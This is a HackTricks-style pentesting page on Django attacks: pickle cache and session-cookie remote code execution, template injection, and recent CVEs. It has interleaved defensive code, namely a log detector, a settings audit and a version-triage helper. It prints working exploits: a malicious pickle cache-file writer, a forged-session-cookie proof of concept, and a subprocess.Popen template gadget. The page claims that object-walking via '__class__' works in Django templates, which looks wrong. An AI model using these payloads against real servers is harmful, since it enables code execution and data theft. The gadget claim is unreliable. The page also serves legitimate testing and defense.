Django
Tip
Learn & practice AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Cache manipulation to RCE
Django's default cache storage method is Python pickles, which can lead to RCE if untrusted input is unpickled. If an attacker can obtain write access to the cache, they can escalate this into RCE on the underlying server.
Django cache is stored in one of four places: Redis, memory, files, or a database. Cache stored in a Redis server or database is the most likely attack vector (Redis injection and SQL injection), but an attacker may also be able to use file-based cache to turn an arbitrary write into RCE. Maintainers have marked this as a non-issue. Note that the cache file folder, the SQL table name and the Redis server details will vary depending on the implementation.
On FileBasedCache, the pickled value is written to a file under CACHES['default']['LOCATION'] (often /var/tmp/django_cache/). If that directory is world-writable or attacker-controlled, dropping a malicious pickle under the expected cache key yields code execution when the app reads it:
```bash
python - <<'PY'
import pickle, os
class RCE:
    def __reduce__(self):
        return (os.system, ("id >/tmp/pwned",))
open('/var/tmp/django_cache/cache:malicious', 'wb').write(pickle.dumps(RCE(), protocol=4))
PY
```
This HackerOne report gives an excellent, reproducible example of exploiting a Django cache stored in an SQLite database: https://hackerone.com/reports/1415436
Server-Side Template Injection (SSTI)
The Django Template Language (DTL) is Turing-complete. If user-supplied data is rendered as a template string (for example by calling Template(user_input).render(), or when |safe/format_html() strip auto-escaping), an attacker can achieve full SSTI → RCE.
Detection
1. Look for dynamic Template()/Engine.from_string()/render_to_string() calls that include any unsanitised data from the request.
2. Send a time-based or arithmetic payload:
{{7*7}}
If the rendered output contains 49, the input is being compiled by the template engine.
3. DTL is not Jinja2: arithmetic/loop payloads regularly raise TemplateSyntaxError/500 while still proving evaluation. Polyglots like ${{<%[%'"}}% are good crash-or-render probes.
Context exfiltration when RCE is blocked
Even if object-walking to subprocess.Popen fails, DTL still exposes the objects that are in scope:
```django
{{ request }} {# confirm SSTI #}
{{ request.META }} {# leak Gunicorn/UWSGI headers, cookies, proxy info #}
{{ users }} {# QuerySet in the context? #}
{{ users.0 }} {# first row #}
{{ users.values }} {# dumps dicts of every column (email/flags/plaintext passwords if stored) #}
```
QuerySet.values() forces rows into dictionaries, bypassing __str__ and exposing every field the queryset returns. This works even when direct Python execution is filtered.
Automation pattern: authenticate, grab the CSRF token, store a marker-prefixed payload in any persistent field (e.g. username/profile bio), then request the view that renders it (AJAX endpoints such as /likes/<id> are common). Parse a stable attribute (e.g. title="...") to recover the rendered result and iterate over payloads.
Primitive to RCE
Django blocks direct access to __import__, but the Python object graph is reachable:
```django
{{''.__class__.mro()[1].__subclasses__()}}
```
Find the index of subprocess.Popen (≈400–500 depending on the Python build) and execute arbitrary commands:
```django
{{''.__class__.mro()[1].__subclasses__()[438]('id',shell=True,stdout=-1).communicate()[0]}}
```
A safer universal gadget is to iterate until cls.__name__ == 'Popen'.
The same gadget works for Debug Toolbar or Django-CMS template rendering features that mishandle user input.
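As an added defensive example (not code from the HackTricks page), a stdlib-only detector for the probes and gadgets listed above, run over constructed Gunicorn-style access-log lines; it is meant as a WAF-rule prototype or a log hunt, and the log lines and the /likes/<id> endpoint are constructed, not real traffic:

```python
import re
from urllib.parse import unquote_plus

# Each rule mirrors a payload family from the section above: the {{7*7}}
# arithmetic probe, the crash-or-render polyglot, object-graph walking,
# context exfiltration (request.META / QuerySet.values) and the Popen gadget.
RULES = [
    ("dtl-expression", re.compile(r"\{\{.*?\}\}|\{%.*?%\}", re.S)),
    ("ssti-polyglot", re.compile(r"\$\{\{<%\[%'\"\}\}%")),
    ("object-walk", re.compile(r"__class__|__subclasses__|\.mro\(\)|__globals__|__builtins__")),
    ("context-exfil", re.compile(r"request\.META|\.values\b|\.__dict__")),
    ("popen-gadget", re.compile(r"Popen|shell\s*=\s*True|\.communicate\(")),
]

def classify(value):
    """Return the rule names triggered by one already URL-decoded input value."""
    return [name for name, rx in RULES if rx.search(value)]

# Constructed access-log sample (not real traffic): three probes and one benign hit.
LOG = """\
10.0.0.5 - - [17/Jan/2026:10:01:02 +0000] "GET /likes/1?bio=%7B%7B7*7%7D%7D HTTP/1.1" 200 512
10.0.0.5 - - [17/Jan/2026:10:01:09 +0000] "GET /likes/1?bio=%24%7B%7B%3C%25%5B%25%27%22%7D%7D%25 HTTP/1.1" 500 0
10.0.0.5 - - [17/Jan/2026:10:02:41 +0000] "GET /likes/1?bio=%7B%7B%27%27.__class__.mro()[1].__subclasses__()%7D%7D HTTP/1.1" 200 90112
10.0.0.9 - - [17/Jan/2026:10:03:00 +0000] "GET /likes/2?bio=hello%20world HTTP/1.1" 200 512
"""

REQ_LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

def scan_log(text):
    """Return [(status, raw_target, hits)] for every line whose decoded URL trips a rule.

    The URL is decoded before matching so %7B%7B-encoded braces are caught; a 500
    next to a DTL expression is itself a signal (TemplateSyntaxError still proves
    evaluation, as the Detection section notes).
    """
    out = []
    for line in text.splitlines():
        m = REQ_LINE.search(line)
        if not m:
            continue
        hits = classify(unquote_plus(m["target"]))
        if hits:
            out.append((int(m["status"]), m["target"], hits))
    return out

if __name__ == "__main__":
    for status, target, hits in scan_log(LOG):
        print(status, ",".join(hits), target)
```

Run the same classify() over POST bodies and stored profile fields as well, since the automation pattern above plants the payload in a persistent field rather than the query string.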
Also see: ReportLab/xhtml2pdf PDF export RCE
Applications built on Django commonly integrate xhtml2pdf/ReportLab to export views as PDF. When user-controlled HTML flows into PDF generation, rl_safe_eval may evaluate expressions inside triple brackets [[[ ... ]]] enabling code execution (CVE-2023-33733). Details, payloads, and mitigations:
Reportlab Xhtml2pdf Triple Brackets Expression Evaluation Rce Cve 2023 33733
Pickle-Backed Session Cookie RCE
If the setting SESSION_SERIALIZER = 'django.contrib.sessions.serializers.PickleSerializer' is enabled (or a custom serializer that deserialises pickle), Django decrypts and unpickles the session cookie before calling any view code. Therefore, possessing a valid signing key (the project SECRET_KEY by default) is enough for immediate remote code execution.
Exploit Requirements
- The server uses PickleSerializer.
- The attacker knows / can guess settings.SECRET_KEY (leaks via GitHub, .env, error pages, etc.).
Proof-of-Concept
```python
#!/usr/bin/env python3
from django.contrib.sessions.serializers import PickleSerializer
from django.core import signing
import os, base64
class RCE(object):
    def __reduce__(self):
        return (os.system, ("id > /tmp/pwned",))
mal = signing.dumps(RCE(), key=b'SECRET_KEY_HERE', serializer=PickleSerializer)
print(f"sessionid={mal}")
```
Send the resulting cookie, and the payload executes with the privileges of the WSGI worker.
Mitigations: keep the default JSONSerializer, rotate SECRET_KEY, and configure SESSION_COOKIE_HTTPONLY.
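A settings audit covering both pickle sinks on this page, the cache backends from the first section and the session serializer from this one, added here as an example and not HackTricks' or Django's own code; it assumes a plain dict mirroring django.conf.settings (so it runs without Django installed) and checks file-cache directory permissions with os.stat:

```python
import os
import stat

FILE_CACHE = "django.core.cache.backends.filebased.FileBasedCache"
# Backends whose rows are reachable through the injection primitives named in
# the cache section (Redis injection, SQL injection); all of them unpickle on read.
NETWORK_CACHES = {
    "django.core.cache.backends.redis.RedisCache": "redis",
    "django.core.cache.backends.db.DatabaseCache": "database",
}

def world_writable(path):
    """True when `path` exists and carries the o+w bit (e.g. a 1777 /tmp)."""
    try:
        return bool(os.stat(path).st_mode & stat.S_IWOTH)
    except FileNotFoundError:
        return False

def audit_settings(settings):
    """Return [(severity, message)] for a plain dict mirroring django.conf.settings.

    Keys read: SESSION_SERIALIZER, SECRET_KEY, CACHES. Assumption: the caller
    builds the dict (e.g. from settings.py) rather than importing Django here.
    """
    findings = []
    serializer = str(settings.get("SESSION_SERIALIZER", ""))
    if "pickle" in serializer.lower():          # catches custom pickle serializers too
        findings.append(("high", f"SESSION_SERIALIZER={serializer}: anyone who "
                         "holds SECRET_KEY gets RCE through the session cookie"))
    if str(settings.get("SECRET_KEY", "")).startswith("django-insecure-"):
        findings.append(("medium", "SECRET_KEY is the startproject default "
                         "(django-insecure-*): likely committed or guessable"))
    for alias, cfg in settings.get("CACHES", {}).items():
        backend, location = cfg.get("BACKEND", ""), str(cfg.get("LOCATION", ""))
        if backend == FILE_CACHE and world_writable(location):
            findings.append(("high", f"CACHES[{alias!r}] file cache at {location} "
                             "is world-writable: a forged pickle file becomes RCE"))
        elif backend == FILE_CACHE:
            findings.append(("info", f"CACHES[{alias!r}] is file-based: keep "
                             f"{location} writable by the app user only"))
        elif backend in NETWORK_CACHES:
            findings.append(("medium", f"CACHES[{alias!r}] uses a "
                             f"{NETWORK_CACHES[backend]} cache: a write primitive "
                             "there yields unpickle RCE on read"))
    return findings
```

PickleSerializer was deprecated in Django 4.1 and removed in 5.0, so the session finding only fires on older projects or on a custom pickle-based serializer.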
Recent (2023-2025) High-Impact Django CVEs Pentesters Should Check
- CVE-2025-48432 – Log Injection via unescaped request.path (fixed June 4 2025). Allows attackers to inject newlines/ANSI codes into log files and poison downstream log analysis. Patch level ≥ 4.2.22 / 5.1.10 / 5.2.2.
- CVE-2024-42005 – Critical SQL injection in QuerySet.values()/values_list() on JSONField (CVSS 9.8). Craft JSON keys so that they break out of quoting and execute arbitrary SQL. Fixed in 4.2.15 / 5.0.8.
Always determine the exact framework version via the X-Frame-Options error page or the /static/admin/css/base.css hash, and test the above where applicable.
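Added here as an example (not from the HackTricks page or from Django): a stdlib-only triage helper that maps a version string to the two CVEs above using the fixed releases the list gives. It goes slightly beyond the list by reporting series the list does not name (e.g. 3.2, or 5.0 for the 2025 CVE) as unsupported rather than safe, and by assuming later series ship the fix.

```python
import re

# cve -> {release series: first fixed patch release}, taken from the list above.
FIXED = {
    "CVE-2025-48432": {(4, 2): (4, 2, 22), (5, 1): (5, 1, 10), (5, 2): (5, 2, 2)},
    "CVE-2024-42005": {(4, 2): (4, 2, 15), (5, 0): (5, 0, 8)},
}

def parse_version(text):
    """'5.1.9' -> (5, 1, 9); '5.2' -> (5, 2, 0); '5.2rc1' -> (5, 2, 0).

    Pre-releases collapse onto the .0 of their series, which is always below
    the fixed patch level in FIXED, so they are correctly treated as vulnerable.
    """
    m = re.match(r"^(\d+)\.(\d+)(?:\.(\d+))?", text.strip())
    if not m:
        raise ValueError(f"unrecognised Django version: {text!r}")
    return tuple(int(x) if x else 0 for x in m.groups())

def triage(version_text):
    """Return {cve: 'vulnerable' | 'fixed' | 'unsupported-series'}."""
    v = parse_version(version_text)
    series = v[:2]
    result = {}
    for cve, table in FIXED.items():
        if series in table:
            result[cve] = "fixed" if v >= table[series] else "vulnerable"
        elif series > max(table):
            result[cve] = "fixed"               # newer series released after the fix
        else:
            result[cve] = "unsupported-series"  # EOL at disclosure time: never patched
    return result

if __name__ == "__main__":
    for ver in ("4.2.21", "5.0.7", "5.1.10", "3.2.25"):
        print(ver, triage(ver))
```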
References
- Django security release – “Django 5.2.2, 5.1.10, 4.2.22 address CVE-2025-48432” – 4 Jun 2025.
- OP-Innovate: “Django releases security updates to address SQL injection flaw CVE-2024-42005” – 11 Aug 2024.
- 0xdf: University (HTB) – Exploiting xhtml2pdf/ReportLab CVE-2023-33733 to gain RCE and pivot into AD – https://0xdf.gitlab.io/2025/08/09/htb-university.html
- Django docs – QuerySet.values(): https://docs.djangoproject.com/en/6.0/ref/models/querysets/#values
- 0xdf: HackNet (HTB) – HTML Attribute Injection → Django SSTI → QuerySet.values data dump → Pickle FileBasedCache RCE – https://0xdf.gitlab.io/2026/01/17/htb-hacknet.html